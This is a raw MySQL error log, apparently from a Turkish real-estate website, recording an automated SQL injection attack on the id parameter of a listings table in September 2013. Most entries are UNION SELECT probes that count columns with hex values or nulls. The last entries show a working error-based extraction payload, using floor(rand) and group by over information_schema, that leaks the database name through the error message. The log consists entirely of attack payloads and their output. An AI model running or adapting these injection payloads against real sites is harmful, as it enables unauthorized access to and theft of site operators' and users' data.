sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:52

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:52

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:53

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:53

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:54

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:54

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:54

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:55

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:55

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:56

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:56

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:57

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:57

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:57

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:58

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:58

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:59

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:59

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:59

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:00

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:00

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:01

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:01

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:02

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:02

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:02

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:03

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:03

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:04

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:04

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:04

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:05

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:05

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:06

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:06

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:06

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:07

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:07

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:08

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:08

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:08

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null where "x"="x"
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where "x"="x"' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:09

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and "1"="1"
hata : Duplicate entry '~'emlaknet_emlak'~1' for key 'group_key'
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:10

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and "1"="1"
hata : Duplicate entry '~'emlaknet_emlak'~1' for key 'group_key'
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:56:11

